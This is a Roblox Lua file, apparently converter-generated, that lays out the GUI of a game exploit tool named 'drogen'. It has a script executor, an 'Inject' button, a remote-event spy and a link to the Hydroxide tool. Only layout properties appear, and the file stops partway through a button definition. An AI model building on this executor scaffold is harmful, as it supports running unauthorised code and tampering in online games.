-- Generated using RoadToGlory's Converter v1.1 (RoadToGlory#9879)

-- Instances:

local Converted = {
	["_luadrogen"] = Instance.new("ScreenGui");
	["_Frame"] = Instance.new("Frame");
	["_CenterFrame"] = Instance.new("LocalScript");
	["_UICorner"] = Instance.new("UICorner");
	["_UIStroke"] = Instance.new("UIStroke");
	["_ICON"] = Instance.new("ImageLabel");
	["_TextLabel"] = Instance.new("TextLabel");
	["_Minimize"] = Instance.new("TextButton");
	["_UICorner1"] = Instance.new("UICorner");
	["_UIStroke1"] = Instance.new("UIStroke");
	["_LocalScript"] = Instance.new("LocalScript");
	["_Line"] = Instance.new("Frame");
	["_OPS"] = Instance.new("Frame");
	["_UICorner2"] = Instance.new("UICorner");
	["_UIStroke2"] = Instance.new("UIStroke");
	["_UIListLayout"] = Instance.new("UIListLayout");
	["_Scripts"] = Instance.new("Frame");
	["_UIStroke3"] = Instance.new("UIStroke");
	["_UICorner3"] = Instance.new("UICorner");
	["_TextButton"] = Instance.new("TextButton");
	["_LocalScript1"] = Instance.new("LocalScript");
	["_ImageLabel"] = Instance.new("ImageLabel");
	["_Executor"] = Instance.new("Frame");
	["_UIStroke4"] = Instance.new("UIStroke");
	["_UICorner4"] = Instance.new("UICorner");
	["_TextButton1"] = Instance.new("TextButton");
	["_LocalScript2"] = Instance.new("LocalScript");
	["_ImageLabel1"] = Instance.new("ImageLabel");
	["_RSpy"] = Instance.new("Frame");
	["_UIStroke5"] = Instance.new("UIStroke");
	["_UICorner5"] = Instance.new("UICorner");
	["_TextButton2"] = Instance.new("TextButton");
	["_LocalScript3"] = Instance.new("LocalScript");
	["_ImageLabel2"] = Instance.new("ImageLabel");
	["_Scripts1"] = Instance.new("ScrollingFrame");
	["_UIListLayout1"] = Instance.new("UIListLayout");
	["_TextButton3"] = Instance.new("TextButton");
	["_UIStroke6"] = Instance.new("UIStroke");
	["_UICorner6"] = Instance.new("UICorner");
	["_LocalScript4"] = Instance.new("LocalScript");
	["_Executor1"] = Instance.new("Frame");
	["_Script"] = Instance.new("ScrollingFrame");
	["_Box"] = Instance.new("TextBox");
	["_LocalScript5"] = Instance.new("LocalScript");
	["_TextLabel1"] = Instance.new("TextLabel");
	["_exe"] = Instance.new("TextButton");
	["_UICorner7"] = Instance.new("UICorner");
	["_UIStroke7"] = Instance.new("UIStroke");
	["_cls"] = Instance.new("TextButton");
	["_UICorner8"] = Instance.new("UICorner");
	["_UIStroke8"] = Instance.new("UIStroke");
	["_SoC"] = Instance.new("TextButton");
	["_UICorner9"] = Instance.new("UICorner");
	["_UIStroke9"] = Instance.new("UIStroke");
	["_inj"] = Instance.new("TextButton");
	["_UICorner10"] = Instance.new("UICorner");
	["_UIStroke10"] = Instance.new("UIStroke");
	["_LocalScript6"] = Instance.new("LocalScript");
	["_LocalScript7"] = Instance.new("LocalScript");
	["_RSpy1"] = Instance.new("Frame");
	["_Remotes"] = Instance.new("ScrollingFrame");
	["_UIListLayout2"] = Instance.new("UIListLayout");
	["_Script1"] = Instance.new("ScrollingFrame");
	["_Box1"] = Instance.new("TextBox");
	["_LocalScript8"] = Instance.new("LocalScript");
	["_TextLabel2"] = Instance.new("TextLabel");
	["_LocalScript9"] = Instance.new("LocalScript");
	["_Func"] = Instance.new("Frame");
	["_ImageLabel3"] = Instance.new("ImageLabel");
	["_TextLabel3"] = Instance.new("TextLabel");
	["_ShowCode"] = Instance.new("TextButton");
	["_Event"] = Instance.new("Frame");
	["_ImageLabel4"] = Instance.new("ImageLabel");
	["_TextLabel4"] = Instance.new("TextLabel");
	["_ShowCode1"] = Instance.new("TextButton");
	["_cc"] = Instance.new("TextButton");
	["_UICorner11"] = Instance.new("UICorner");
	["_UIStroke11"] = Instance.new("UIStroke");
	["_LocalScript10"] = Instance.new("LocalScript");
	["_rc"] = Instance.new("TextButton");
	["_UICorner12"] = Instance.new("UICorner");
	["_UIStroke12"] = Instance.new("UIStroke");
	["_LocalScript11"] = Instance.new("LocalScript");
	["_Open"] = Instance.new("TextButton");
	["_UICorner13"] = Instance.new("UICorner");
	["_UIStroke13"] = Instance.new("UIStroke");
	["_ImageLabel5"] = Instance.new("ImageLabel");
	["_LocalScript12"] = Instance.new("LocalScript");
	["_LocalScript13"] = Instance.new("LocalScript");
	["_CenterFrame1"] = Instance.new("LocalScript");
}

-- Properties:

Converted["_luadrogen"].ResetOnSpawn = false
Converted["_luadrogen"].ZIndexBehavior = Enum.ZIndexBehavior.Sibling
Converted["_luadrogen"].Name = "luadrogen"
Converted["_luadrogen"].Parent = game:GetService("CoreGui")

Converted["_Frame"].BackgroundColor3 = Color3.fromRGB(29.000002071261406, 29.000002071261406, 29.000002071261406)
Converted["_Frame"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_Frame"].BorderSizePixel = 0
Converted["_Frame"].Position = UDim2.new(0.307453424, 0, 0.27638191, 0)
Converted["_Frame"].Size = UDim2.new(0, 478, 0, 286)
Converted["_Frame"].Visible = false
Converted["_Frame"].Parent = Converted["_luadrogen"]

Converted["_UICorner"].Parent = Converted["_Frame"]

Converted["_UIStroke"].Color = Color3.fromRGB(1.0000000591389835, 1.0000000591389835, 128.0000075697899)
Converted["_UIStroke"].Thickness = 1.5
Converted["_UIStroke"].Parent = Converted["_Frame"]

Converted["_ICON"].Image = "rbxassetid://148252927"
Converted["_ICON"].ImageContent = Content
Converted["_ICON"].BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Converted["_ICON"].BackgroundTransparency = 1
Converted["_ICON"].BorderColor3 = Color3.fromRGB(0, 0, 126.00000768899918)
Converted["_ICON"].Position = UDim2.new(0.0230125524, 0, 0.0244755242, 0)
Converted["_ICON"].Size = UDim2.new(0, 45, 0, 47)
Converted["_ICON"].Name = "ICON"
Converted["_ICON"].Parent = Converted["_Frame"]

Converted["_TextLabel"].Font = Enum.Font.Arial
Converted["_TextLabel"].Text = "drogen"
Converted["_TextLabel"].TextColor3 = Color3.fromRGB(255, 255, 255)
Converted["_TextLabel"].TextSize = 19
Converted["_TextLabel"].TextYAlignment = Enum.TextYAlignment.Bottom
Converted["_TextLabel"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_TextLabel"].BackgroundTransparency = 1
Converted["_TextLabel"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_TextLabel"].BorderSizePixel = 0
Converted["_TextLabel"].Position = UDim2.new(-0.75555557, 0, 0, 0)
Converted["_TextLabel"].Size = UDim2.new(0, 200, 0, 36)
Converted["_TextLabel"].Parent = Converted["_ICON"]

Converted["_Minimize"].Font = Enum.Font.Arial
Converted["_Minimize"].Text = "-"
Converted["_Minimize"].TextColor3 = Color3.fromRGB(255, 255, 255)
Converted["_Minimize"].TextSize = 30
Converted["_Minimize"].BackgroundColor3 = Color3.fromRGB(29.000002071261406, 29.000002071261406, 29.000002071261406)
Converted["_Minimize"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_Minimize"].BorderSizePixel = 0
Converted["_Minimize"].Position = UDim2.new(0.891213417, 0, 0.0244755242, 0)
Converted["_Minimize"].Size = UDim2.new(0, 43, 0, 43)
Converted["_Minimize"].Name = "Minimize"
Converted["_Minimize"].Parent = Converted["_Frame"]

Converted["_UICorner1"].Parent = Converted["_Minimize"]

Converted["_UIStroke1"].ApplyStrokeMode = Enum.ApplyStrokeMode.Border
Converted["_UIStroke1"].Color = Color3.fromRGB(1.0000000591389835, 1.0000000591389835, 128.0000075697899)
Converted["_UIStroke1"].Thickness = 1.5
Converted["_UIStroke1"].Parent = Converted["_Minimize"]

Converted["_Line"].BackgroundColor3 = Color3.fromRGB(0, 0, 128.0000075697899)
Converted["_Line"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_Line"].BorderSizePixel = 0
Converted["_Line"].Position = UDim2.new(0, 0, 0.192307696, 0)
Converted["_Line"].Size = UDim2.new(0, 478, 0, -1)
Converted["_Line"].Name = "Line"
Converted["_Line"].Parent = Converted["_Frame"]

Converted["_OPS"].BackgroundColor3 = Color3.fromRGB(29.000002071261406, 29.000002071261406, 29.000002071261406)
Converted["_OPS"].BorderColor3 = Color3.fromRGB(0, 0, 128.0000075697899)
Converted["_OPS"].Position = UDim2.new(0, 0, 0.192307696, 0)
Converted["_OPS"].Size = UDim2.new(0, 100, 0, 231)
Converted["_OPS"].Name = "OPS"
Converted["_OPS"].Parent = Converted["_Frame"]

Converted["_UICorner2"].Parent = Converted["_OPS"]

Converted["_UIStroke2"].Color = Color3.fromRGB(1.0000000591389835, 1.0000000591389835, 128.0000075697899)
Converted["_UIStroke2"].Thickness = 1.5
Converted["_UIStroke2"].Parent = Converted["_OPS"]

Converted["_UIListLayout"].SortOrder = Enum.SortOrder.LayoutOrder
Converted["_UIListLayout"].Parent = Converted["_OPS"]

Converted["_Scripts"].BackgroundColor3 = Color3.fromRGB(60.00000402331352, 60.00000402331352, 60.00000402331352)
Converted["_Scripts"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_Scripts"].BorderSizePixel = 0
Converted["_Scripts"].Size = UDim2.new(0, 100, 0, 30)
Converted["_Scripts"].Name = "Scripts"
Converted["_Scripts"].Parent = Converted["_OPS"]

Converted["_UIStroke3"].Color = Color3.fromRGB(1.0000000591389835, 1.0000000591389835, 128.0000075697899)
Converted["_UIStroke3"].Thickness = 1.5
Converted["_UIStroke3"].Parent = Converted["_Scripts"]

Converted["_UICorner3"].Parent = Converted["_Scripts"]

Converted["_TextButton"].Font = Enum.Font.Arial
Converted["_TextButton"].Text = "Scripts "
Converted["_TextButton"].TextColor3 = Color3.fromRGB(255, 255, 255)
Converted["_TextButton"].TextSize = 14
Converted["_TextButton"].TextXAlignment = Enum.TextXAlignment.Right
Converted["_TextButton"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_TextButton"].BackgroundTransparency = 1
Converted["_TextButton"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_TextButton"].BorderSizePixel = 0
Converted["_TextButton"].Size = UDim2.new(1, 0, 1, 0)
Converted["_TextButton"].Parent = Converted["_Scripts"]

Converted["_ImageLabel"].Image = "rbxassetid://30673364"
Converted["_ImageLabel"].ImageContent = Content
Converted["_ImageLabel"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_ImageLabel"].BackgroundTransparency = 1
Converted["_ImageLabel"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_ImageLabel"].BorderSizePixel = 0
Converted["_ImageLabel"].Position = UDim2.new(0.109999999, 0, 0, 0)
Converted["_ImageLabel"].Size = UDim2.new(0, 30, 0, 30)
Converted["_ImageLabel"].Parent = Converted["_TextButton"]

Converted["_Executor"].BackgroundColor3 = Color3.fromRGB(60.00000402331352, 60.00000402331352, 60.00000402331352)
Converted["_Executor"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_Executor"].BorderSizePixel = 0
Converted["_Executor"].Size = UDim2.new(0, 100, 0, 30)
Converted["_Executor"].Name = "Executor"
Converted["_Executor"].Parent = Converted["_OPS"]

Converted["_UIStroke4"].Color = Color3.fromRGB(1.0000000591389835, 1.0000000591389835, 128.0000075697899)
Converted["_UIStroke4"].Thickness = 1.5
Converted["_UIStroke4"].Parent = Converted["_Executor"]

Converted["_UICorner4"].Parent = Converted["_Executor"]

Converted["_TextButton1"].Font = Enum.Font.Arial
Converted["_TextButton1"].Text = "Executor "
Converted["_TextButton1"].TextColor3 = Color3.fromRGB(255, 255, 255)
Converted["_TextButton1"].TextSize = 14
Converted["_TextButton1"].TextXAlignment = Enum.TextXAlignment.Right
Converted["_TextButton1"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_TextButton1"].BackgroundTransparency = 1
Converted["_TextButton1"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_TextButton1"].BorderSizePixel = 0
Converted["_TextButton1"].Size = UDim2.new(1, 0, 1, 0)
Converted["_TextButton1"].Parent = Converted["_Executor"]

Converted["_ImageLabel1"].Image = "rbxassetid://46342657"
Converted["_ImageLabel1"].ImageContent = Content
Converted["_ImageLabel1"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_ImageLabel1"].BackgroundTransparency = 1
Converted["_ImageLabel1"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_ImageLabel1"].BorderSizePixel = 0
Converted["_ImageLabel1"].Position = UDim2.new(0.109999999, 0, 0, 0)
Converted["_ImageLabel1"].Size = UDim2.new(0, 30, 0, 30)
Converted["_ImageLabel1"].Parent = Converted["_TextButton1"]

Converted["_RSpy"].BackgroundColor3 = Color3.fromRGB(60.00000402331352, 60.00000402331352, 60.00000402331352)
Converted["_RSpy"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_RSpy"].BorderSizePixel = 0
Converted["_RSpy"].Size = UDim2.new(0, 100, 0, 30)
Converted["_RSpy"].Name = "RSpy"
Converted["_RSpy"].Parent = Converted["_OPS"]

Converted["_UIStroke5"].Color = Color3.fromRGB(1.0000000591389835, 1.0000000591389835, 128.0000075697899)
Converted["_UIStroke5"].Thickness = 1.5
Converted["_UIStroke5"].Parent = Converted["_RSpy"]

Converted["_UICorner5"].Parent = Converted["_RSpy"]

Converted["_TextButton2"].Font = Enum.Font.Arial
Converted["_TextButton2"].Text = "RSpy "
Converted["_TextButton2"].TextColor3 = Color3.fromRGB(255, 255, 255)
Converted["_TextButton2"].TextSize = 14
Converted["_TextButton2"].TextXAlignment = Enum.TextXAlignment.Right
Converted["_TextButton2"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_TextButton2"].BackgroundTransparency = 1
Converted["_TextButton2"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_TextButton2"].BorderSizePixel = 0
Converted["_TextButton2"].Size = UDim2.new(1, 0, 1, 0)
Converted["_TextButton2"].Parent = Converted["_RSpy"]

Converted["_ImageLabel2"].Image = "rbxassetid://15170416971"
Converted["_ImageLabel2"].ImageContent = Content
Converted["_ImageLabel2"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_ImageLabel2"].BackgroundTransparency = 1
Converted["_ImageLabel2"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_ImageLabel2"].BorderSizePixel = 0
Converted["_ImageLabel2"].Position = UDim2.new(0.109999999, 0, 0, 0)
Converted["_ImageLabel2"].Size = UDim2.new(0, 30, 0, 30)
Converted["_ImageLabel2"].Parent = Converted["_TextButton2"]

Converted["_Scripts1"].BottomImage = "rbxassetid://16376862656"
Converted["_Scripts1"].BottomImageContent = Content
Converted["_Scripts1"].MidImage = "rbxassetid://14731175383"
Converted["_Scripts1"].MidImageContent = Content
Converted["_Scripts1"].TopImage = "rbxassetid://16376858572"
Converted["_Scripts1"].TopImageContent = Content
Converted["_Scripts1"].Active = true
Converted["_Scripts1"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_Scripts1"].BackgroundTransparency = 1
Converted["_Scripts1"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_Scripts1"].BorderSizePixel = 0
Converted["_Scripts1"].Position = UDim2.new(0.209205016, 0, 0.192307696, 0)
Converted["_Scripts1"].Size = UDim2.new(0, 378, 0, 231)
Converted["_Scripts1"].Visible = false
Converted["_Scripts1"].Name = "Scripts"
Converted["_Scripts1"].Parent = Converted["_Frame"]

Converted["_UIListLayout1"].SortOrder = Enum.SortOrder.LayoutOrder
Converted["_UIListLayout1"].Parent = Converted["_Scripts1"]

Converted["_TextButton3"].Font = Enum.Font.Arial
Converted["_TextButton3"].Text = "Hydroxide"
Converted["_TextButton3"].TextColor3 = Color3.fromRGB(255, 255, 255)
Converted["_TextButton3"].TextSize = 14
Converted["_TextButton3"].BackgroundColor3 = Color3.fromRGB(29.000002071261406, 29.000002071261406, 29.000002071261406)
Converted["_TextButton3"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_TextButton3"].BorderSizePixel = 0
Converted["_TextButton3"].Size = UDim2.new(0, 362, 0, 16)
Converted["_TextButton3"].Parent = Converted["_Scripts1"]

Converted["_UIStroke6"].ApplyStrokeMode = Enum.ApplyStrokeMode.Border
Converted["_UIStroke6"].Color = Color3.fromRGB(1.0000000591389835, 1.0000000591389835, 128.0000075697899)
Converted["_UIStroke6"].Thickness = 1.5
Converted["_UIStroke6"].Parent = Converted["_TextButton3"]

Converted["_UICorner6"].Parent = Converted["_TextButton3"]

Converted["_Executor1"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_Executor1"].BackgroundTransparency = 1
Converted["_Executor1"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_Executor1"].BorderSizePixel = 0
Converted["_Executor1"].Position = UDim2.new(0.209000006, 0, 0.192000002, 0)
Converted["_Executor1"].Size = UDim2.new(0, 378, 0, 231)
Converted["_Executor1"].Visible = false
Converted["_Executor1"].Name = "Executor"
Converted["_Executor1"].Parent = Converted["_Frame"]

Converted["_Script"].BottomImage = "rbxassetid://16376862656"
Converted["_Script"].BottomImageContent = Content
Converted["_Script"].CanvasSize = UDim2.new(0, 0, 10000, 0)
Converted["_Script"].MidImage = "rbxassetid://14731175383"
Converted["_Script"].MidImageContent = Content
Converted["_Script"].TopImage = "rbxassetid://16376858572"
Converted["_Script"].TopImageContent = Content
Converted["_Script"].Active = true
Converted["_Script"].BackgroundColor3 = Color3.fromRGB(46.000001057982445, 46.000001057982445, 46.000001057982445)
Converted["_Script"].BorderColor3 = Color3.fromRGB(0, 0, 128.0000075697899)
Converted["_Script"].Position = UDim2.new(0.0317460336, 0, 0.0432900451, 0)
Converted["_Script"].Size = UDim2.new(0, 314, 0, 136)
Converted["_Script"].Name = "Script"
Converted["_Script"].Parent = Converted["_Executor1"]

Converted["_Box"].ClearTextOnFocus = false
Converted["_Box"].CursorPosition = -1
Converted["_Box"].Font = Enum.Font.RobotoMono
Converted["_Box"].MultiLine = true
Converted["_Box"].Text = ""
Converted["_Box"].TextColor3 = Color3.fromRGB(255, 255, 255)
Converted["_Box"].TextSize = 14
Converted["_Box"].TextXAlignment = Enum.TextXAlignment.Left
Converted["_Box"].TextYAlignment = Enum.TextYAlignment.Top
Converted["_Box"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_Box"].BackgroundTransparency = 1
Converted["_Box"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_Box"].BorderSizePixel = 0
Converted["_Box"].Size = UDim2.new(1, 0, 1, 0)
Converted["_Box"].Name = "Box"
Converted["_Box"].Parent = Converted["_Script"]

Converted["_TextLabel1"].Font = Enum.Font.RobotoMono
Converted["_TextLabel1"].RichText = true
Converted["_TextLabel1"].Text = ""
Converted["_TextLabel1"].TextColor3 = Color3.fromRGB(255, 255, 255)
Converted["_TextLabel1"].TextSize = 14
Converted["_TextLabel1"].TextXAlignment = Enum.TextXAlignment.Left
Converted["_TextLabel1"].TextYAlignment = Enum.TextYAlignment.Top
Converted["_TextLabel1"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_TextLabel1"].BackgroundTransparency = 1
Converted["_TextLabel1"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_TextLabel1"].BorderSizePixel = 0
Converted["_TextLabel1"].Size = UDim2.new(1, 0, 1, 0)
Converted["_TextLabel1"].Parent = Converted["_Box"]

Converted["_exe"].Font = Enum.Font.Arial
Converted["_exe"].Text = "Execute"
Converted["_exe"].TextColor3 = Color3.fromRGB(255, 255, 255)
Converted["_exe"].TextSize = 17
Converted["_exe"].BackgroundColor3 = Color3.fromRGB(29.000002071261406, 29.000002071261406, 29.000002071261406)
Converted["_exe"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_exe"].BorderSizePixel = 0
Converted["_exe"].Position = UDim2.new(0.0314250328, 0, 0.68248415, 0)
Converted["_exe"].Size = UDim2.new(0, 134, 0, 25)
Converted["_exe"].Name = "exe"
Converted["_exe"].Parent = Converted["_Executor1"]

Converted["_UICorner7"].Parent = Converted["_exe"]

Converted["_UIStroke7"].ApplyStrokeMode = Enum.ApplyStrokeMode.Border
Converted["_UIStroke7"].Color = Color3.fromRGB(1.0000000591389835, 1.0000000591389835, 128.0000075697899)
Converted["_UIStroke7"].Thickness = 1.5
Converted["_UIStroke7"].Parent = Converted["_exe"]

Converted["_cls"].Font = Enum.Font.Arial
Converted["_cls"].Text = "Clear"
Converted["_cls"].TextColor3 = Color3.fromRGB(255, 255, 255)
Converted["_cls"].TextSize = 17
Converted["_cls"].BackgroundColor3 = Color3.fromRGB(29.000002071261406, 29.000002071261406, 29.000002071261406)
Converted["_cls"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_cls"].BorderSizePixel = 0
Converted["_cls"].Position = UDim2.new(0.0314250328, 0, 0.833999276, 0)
Converted["_cls"].Size = UDim2.new(0, 134, 0, 25)
Converted["_cls"].Name = "cls"
Converted["_cls"].Parent = Converted["_Executor1"]

Converted["_UICorner8"].Parent = Converted["_cls"]

Converted["_UIStroke8"].ApplyStrokeMode = Enum.ApplyStrokeMode.Border
Converted["_UIStroke8"].Color = Color3.fromRGB(1.0000000591389835, 1.0000000591389835, 128.0000075697899)
Converted["_UIStroke8"].Thickness = 1.5
Converted["_UIStroke8"].Parent = Converted["_cls"]

Converted["_SoC"].Font = Enum.Font.Arial
Converted["_SoC"].Text = "GOTO server"
Converted["_SoC"].TextColor3 = Color3.fromRGB(255, 255, 255)
Converted["_SoC"].TextSize = 17
Converted["_SoC"].BackgroundColor3 = Color3.fromRGB(29.000002071261406, 29.000002071261406, 29.000002071261406)
Converted["_SoC"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_SoC"].BorderSizePixel = 0
Converted["_SoC"].Position = UDim2.new(0.425604939, 0, 0.68248415, 0)
Converted["_SoC"].Size = UDim2.new(0, 134, 0, 25)
Converted["_SoC"].Name = "SoC"
Converted["_SoC"].Parent = Converted["_Executor1"]

Converted["_UICorner9"].Parent = Converted["_SoC"]

Converted["_UIStroke9"].ApplyStrokeMode = Enum.ApplyStrokeMode.Border
Converted["_UIStroke9"].Color = Color3.fromRGB(1.0000000591389835, 1.0000000591389835, 128.0000075697899)
Converted["_UIStroke9"].Thickness = 1.5
Converted["_UIStroke9"].Parent = Converted["_SoC"]

Converted["_inj"].Font = Enum.Font.Arial
Converted["_inj"].Text = "Inject"
Converted["_inj"].TextColor3 = Color3.fromRGB(255, 255, 255)
Converted["_inj"].TextSize = 17
Converted["_inj"].BackgroundColor3 = Color3.fromRGB(29.000002071261406, 29.000002071261406, 29.000002071261406)
Converted["_inj"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_inj"].BorderSizePixel = 0
Converted["_inj"].Position = UDim2.new(0.425604939, 0, 0.833999276, 0)
Converted["_inj"].Size = UDim2.new(0, 134, 0, 25)
Converted["_inj"].Visible = false
Converted["_inj"].Name = "inj"
Converted["_inj"].Parent = Converted["_Executor1"]

Converted["_UICorner10"].Parent = Converted["_inj"]

Converted["_UIStroke10"].ApplyStrokeMode = Enum.ApplyStrokeMode.Border
Converted["_UIStroke10"].Color = Color3.fromRGB(1.0000000591389835, 1.0000000591389835, 128.0000075697899)
Converted["_UIStroke10"].Thickness = 1.5
Converted["_UIStroke10"].Parent = Converted["_inj"]

Converted["_RSpy1"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_RSpy1"].BackgroundTransparency = 1
Converted["_RSpy1"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_RSpy1"].BorderSizePixel = 0
Converted["_RSpy1"].Position = UDim2.new(0.209000006, 0, 0.192000002, 0)
Converted["_RSpy1"].Size = UDim2.new(0, 378, 0, 231)
Converted["_RSpy1"].Visible = false
Converted["_RSpy1"].Name = "RSpy"
Converted["_RSpy1"].Parent = Converted["_Frame"]

Converted["_Remotes"].BottomImage = "rbxassetid://16376862656"
Converted["_Remotes"].BottomImageContent = Content
Converted["_Remotes"].CanvasSize = UDim2.new(0, 0, 7, 0)
Converted["_Remotes"].MidImage = "rbxassetid://14731175383"
Converted["_Remotes"].MidImageContent = Content
Converted["_Remotes"].TopImage = "rbxassetid://16376858572"
Converted["_Remotes"].TopImageContent = Content
Converted["_Remotes"].Active = true
Converted["_Remotes"].BackgroundColor3 = Color3.fromRGB(46.000001057982445, 46.000001057982445, 46.000001057982445)
Converted["_Remotes"].BorderColor3 = Color3.fromRGB(0, 0, 128.0000075697899)
Converted["_Remotes"].Size = UDim2.new(0, 140, 0, 231)
Converted["_Remotes"].Name = "Remotes"
Converted["_Remotes"].Parent = Converted["_RSpy1"]

Converted["_UIListLayout2"].SortOrder = Enum.SortOrder.LayoutOrder
Converted["_UIListLayout2"].Parent = Converted["_Remotes"]

Converted["_Script1"].BottomImage = "rbxassetid://16376862656"
Converted["_Script1"].BottomImageContent = Content
Converted["_Script1"].CanvasSize = UDim2.new(0, 0, 7, 0)
Converted["_Script1"].MidImage = "rbxassetid://14731175383"
Converted["_Script1"].MidImageContent = Content
Converted["_Script1"].TopImage = "rbxassetid://16376858572"
Converted["_Script1"].TopImageContent = Content
Converted["_Script1"].Active = true
Converted["_Script1"].BackgroundColor3 = Color3.fromRGB(46.000001057982445, 46.000001057982445, 46.000001057982445)
Converted["_Script1"].BorderColor3 = Color3.fromRGB(0, 0, 128.0000075697899)
Converted["_Script1"].Position = UDim2.new(0.370370358, 0, 0, 0)
Converted["_Script1"].Size = UDim2.new(0, 238, 0, 115)
Converted["_Script1"].Name = "Script"
Converted["_Script1"].Parent = Converted["_RSpy1"]

Converted["_Box1"].CursorPosition = -1
Converted["_Box1"].Font = Enum.Font.RobotoMono
Converted["_Box1"].Text = ""
Converted["_Box1"].TextColor3 = Color3.fromRGB(255, 255, 255)
Converted["_Box1"].TextEditable = false
Converted["_Box1"].TextSize = 14
Converted["_Box1"].TextXAlignment = Enum.TextXAlignment.Left
Converted["_Box1"].TextYAlignment = Enum.TextYAlignment.Top
Converted["_Box1"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_Box1"].BackgroundTransparency = 1
Converted["_Box1"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_Box1"].BorderSizePixel = 0
Converted["_Box1"].Size = UDim2.new(1, 0, 1, 0)
Converted["_Box1"].Name = "Box"
Converted["_Box1"].Parent = Converted["_Script1"]

Converted["_TextLabel2"].Font = Enum.Font.RobotoMono
Converted["_TextLabel2"].RichText = true
Converted["_TextLabel2"].Text = ""
Converted["_TextLabel2"].TextColor3 = Color3.fromRGB(255, 255, 255)
Converted["_TextLabel2"].TextSize = 14
Converted["_TextLabel2"].TextXAlignment = Enum.TextXAlignment.Left
Converted["_TextLabel2"].TextYAlignment = Enum.TextYAlignment.Top
Converted["_TextLabel2"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_TextLabel2"].BackgroundTransparency = 1
Converted["_TextLabel2"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_TextLabel2"].BorderSizePixel = 0
Converted["_TextLabel2"].Size = UDim2.new(1, 0, 1, 0)
Converted["_TextLabel2"].Parent = Converted["_Box1"]

Converted["_cc"].Font = Enum.Font.Arial
Converted["_cc"].Text = "Copy Code"
Converted["_cc"].TextColor3 = Color3.fromRGB(255, 255, 255)
Converted["_cc"].TextSize = 13
Converted["_cc"].BackgroundColor3 = Color3.fromRGB(29.000002071261406, 29.000002071261406, 29.000002071261406)
Converted["_cc"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_cc"].BorderSizePixel = 0
Converted["_cc"].Position = UDim2.new(0.402116388, 0, 0.532467544, 0)
Converted["_cc"].Size = UDim2.new(0, 83, 0, 18)
Converted["_cc"].Name = "cc"
Converted["_cc"].Parent = Converted["_RSpy1"]

Converted["_UICorner11"].Parent = Converted["_cc"]

Converted["_UIStroke11"].ApplyStrokeMode = Enum.ApplyStrokeMode.Border
Converted["_UIStroke11"].Color = Color3.fromRGB(1.0000000591389835, 1.0000000591389835, 128.0000075697899)
Converted["_UIStroke11"].Thickness = 1.5
Converted["_UIStroke11"].Parent = Converted["_cc"]

Converted["_rc"].Font = Enum.Font.Arial
Converted["_rc"].Text = "Run Code"
Converted["_rc"].TextColor3 = Color3.fromRGB(255, 255, 255)
Converted["_rc"].TextSize = 13
Converted["_rc"].BackgroundColor3 = Color3.fromRGB(29.000002071261406, 29.000002071261406, 29.000002071261406)
Converted["_rc"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_rc"].BorderSizePixel = 0
Converted["_rc"].Position = UDim2.new(0.642857134, 0, 0.532467544, 0)
Converted["_rc"].Size = UDim2.new(0, 83, 0, 18)
Converted["_rc"].Name = "rc"
Converted["_rc"].Parent = Converted["_RSpy1"]

Converted["_UICorner12"].Parent = Converted["_rc"]

Converted["_UIStroke12"].ApplyStrokeMode = Enum.ApplyStrokeMode.Border
Converted["_UIStroke12"].Color = Color3.fromRGB(1.0000000591389835, 1.0000000591389835, 128.0000075697899)
Converted["_UIStroke12"].Thickness = 1.5
Converted["_UIStroke12"].Parent = Converted["_rc"]

Converted["_Open"].Font = Enum.Font.Arial
Converted["_Open"].Text = "drogen"
Converted["_Open"].TextColor3 = Color3.fromRGB(255, 255, 255)
Converted["_Open"].TextSize = 19
Converted["_Open"].TextWrapped = true
Converted["_Open"].TextXAlignment = Enum.TextXAlignment.Right
Converted["_Open"].TextYAlignment = Enum.TextYAlignment.Bottom
Converted["_Open"].BackgroundColor3 = Color3.fromRGB(29.000002071261406, 29.000002071261406, 29.000002071261406)
Converted["_Open"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_Open"].BorderSizePixel = 0
